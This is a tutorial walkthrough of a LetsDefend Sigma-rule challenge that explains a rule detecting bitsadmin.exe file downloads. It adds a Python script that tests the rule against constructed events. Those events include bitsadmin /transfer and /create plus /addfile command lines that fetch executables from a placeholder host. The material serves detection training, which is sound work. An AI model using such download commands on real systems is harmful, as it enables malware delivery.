Learn Sigma
Let's Defend Malware Analysis [Beginner]


#tutorial

Challenge Description

image

Solution and Analysis

First, open the .yml file in Notepad++ to analyze the rule.

image

1. Which executable file was specifically targeted by this Sigma rule?

  • Answer: The rule specifically targets the bitsadmin.exe executable. This is defined in the selection_img block, which looks for a process image name ending in \bitsadmin.exe.

2. What command-line option is used to indicate a file transfer in this rule?

  • Answer: The primary command-line option used to indicate a file transfer is /transfer, as specified in the selection_cmd block.

3. What logical expression in the condition field combined the criteria to trigger this rule?

  • Answer: The logical expression is selection_img and (selection_cmd or all of selection_cli_*). This means the rule triggers if the bitsadmin.exe process is created AND either the simple /transfer command is used OR the combination of /create, /addfile, and a URL (http) is present.

4. Which specific field did this rule capture that shows the command being executed?

  • Answer: The rule is configured to capture the CommandLine field. This field contains the full command string that was executed, which is essential for investigating the activity.

5. Which single ATT&CK tactic tag is listed first in this rule?

  • Answer: The first MITRE ATT&CK tactic listed is attack.defense-evasion. This aligns with the technique of using a trusted system utility to perform malicious actions.

6. What is the primary category of events that this Sigma rule was written to monitor?

  • Answer: The rule monitors the process_creation event category, as specified in the logsource section. This means the rule is evaluated against every event in which a new process is started.

7. What specific command-line argument did this rule look for to identify HTTP-based downloads?

  • Answer: The rule looks for the presence of the string http within the command line. This is defined in the selection_cli_2 block and serves as a strong indicator of a download from a web server.

8. Which command-line option must be present to create a new transfer using bitsadmin?

  • Answer: To create a new transfer job, the /create command-line option must be present. This is a key part of the multi-step download detection logic defined in selection_cli_1.

Conclusion

In summary, this Sigma rule provides robust detection for a known malicious technique. By monitoring process_creation events for bitsadmin.exe and inspecting the command-line arguments for specific switches like /transfer or the /create and /addfile combination, it can effectively identify attempts to download files from the internet, a common step in malware infection chains.
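To see the detection logic in action, the following Python script reconstructs the rule as the walkthrough describes it and evaluates it against a few constructed process_creation events. This is an added example, not the challenge's rule file or LetsDefend's code; the Sigma field name Image and the contains/endswith modifiers are assumptions about how the rule is written, and the sample command lines are constructed, not real telemetry.

```python
# Constructed selections mirroring the walkthrough's description of the rule.
# Field names follow Sigma's process_creation schema (Image, CommandLine); assumed.
SELECTION_IMG = {"Image|endswith": "\\bitsadmin.exe"}
SELECTION_CMD = {"CommandLine|contains": "/transfer"}
SELECTION_CLI_1 = {"CommandLine|contains|all": ["/create", "/addfile"]}
SELECTION_CLI_2 = {"CommandLine|contains": "http"}

def match_selection(selection: dict, event: dict) -> bool:
    """Return True if every field/modifier pair in the selection matches the event.
    Sigma string matching is case-insensitive, so both sides are lower-cased."""
    for key, expected in selection.items():
        field, *modifiers = key.split("|")
        value = str(event.get(field, "")).lower()
        wanted = [w.lower() for w in (expected if isinstance(expected, list) else [expected])]
        if "endswith" in modifiers:
            ok = any(value.endswith(w) for w in wanted)
        elif "contains" in modifiers:
            hits = [w in value for w in wanted]
            ok = all(hits) if "all" in modifiers else any(hits)  # |all needs every value
        else:
            ok = value in wanted  # plain equality when no modifier is given
        if not ok:
            return False
    return True

def rule_matches(event: dict) -> bool:
    """condition: selection_img and (selection_cmd or all of selection_cli_*)"""
    img = match_selection(SELECTION_IMG, event)
    cmd = match_selection(SELECTION_CMD, event)
    cli_all = all(match_selection(s, event) for s in (SELECTION_CLI_1, SELECTION_CLI_2))
    return img and (cmd or cli_all)

# Constructed sample process_creation events (not real telemetry).
BITS = "C:\\Windows\\System32\\bitsadmin.exe"
SAMPLE_EVENTS = [
    {"Image": BITS, "CommandLine": "bitsadmin /transfer job http://example.invalid/a.exe C:\\Public\\a.exe"},
    {"Image": BITS, "CommandLine": "bitsadmin /create job & bitsadmin /addfile job http://example.invalid/b C:\\b"},
    {"Image": BITS, "CommandLine": "bitsadmin /list /allusers"},  # benign enumeration, no match
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c bitsadmin /transfer x http://example.invalid/c c"},  # wrong Image, no match
]

def run() -> list:
    """Apply the rule to every sample event; returns [True, True, False, False]."""
    return [rule_matches(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for event, hit in zip(SAMPLE_EVENTS, run()):
        print("MATCH" if hit else "no   ", event["CommandLine"])
```

The fourth event shows why selection_img matters: the same bitsadmin switches launched through cmd.exe do not match this rule, because the Image field is cmd.exe rather than bitsadmin.exe.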